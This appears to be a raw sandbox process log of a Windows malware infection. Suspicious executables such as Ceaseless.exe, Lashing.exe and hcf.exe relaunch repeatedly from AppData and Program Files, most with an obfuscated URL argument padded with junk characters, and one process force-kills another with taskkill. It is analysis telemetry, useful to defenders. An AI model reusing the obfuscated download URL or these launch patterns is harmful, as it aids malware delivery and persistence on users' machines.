C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4260
- C:\Users\Admin\AppData\Local\Temp\nso8E57.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nso8E57.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:3224

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7296

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:4264

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3584
- C:\Users\Admin\AppData\Local\Temp\nsjF464.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsjF464.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:556

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:1684

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:1584

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10056

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9352

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:3648

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9588

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9292

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2360

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9368
- C:\Users\Admin\AppData\Local\Temp\nsxBBEA.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsxBBEA.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:8752

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3812

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8840
- C:\Users\Admin\AppData\Local\Temp\nsk16F.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nsk16F.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:6560

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:7112

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:4456

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9720

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6076

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7528

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3796

C:\Program Files (x86)\Neurobiological\theocracy.exe
"C:\Program Files (x86)\Neurobiological\theocracy.exe"
1⤵
PID:7584
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /f /im Ceaseless.exe
  2⤵
  - Kills process with taskkill
  PID:1224

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3928

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5048

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:4972

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:7476

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5312
- C:\Users\Admin\AppData\Local\Temp\nse4BA7.tmp\Ceaseless.exe
  C:\Users\Admin\AppData\Local\Temp\nse4BA7.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
  2⤵
  PID:3768

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8776

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7912

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2168

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5928

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6672

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4908

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:4280

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8332

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9756

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8100

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x3cc
1⤵
PID:1524

C:\Program Files (x86)\Neurobiological\theocracy.exe
"C:\Program Files (x86)\Neurobiological\theocracy.exe"
1⤵
PID:3404

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7924

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:9744

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:1412

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9612

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8152

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8576

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8852

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10028

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7540

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3920

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10220

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9764

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9688

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7012

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:4668

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8684

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3848

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:8580

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:9968

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:1300

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:9940

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:8976

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3024

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5984

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:10036

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:2756

C:\Users\Admin\AppData\Local\Ceaseless.exe
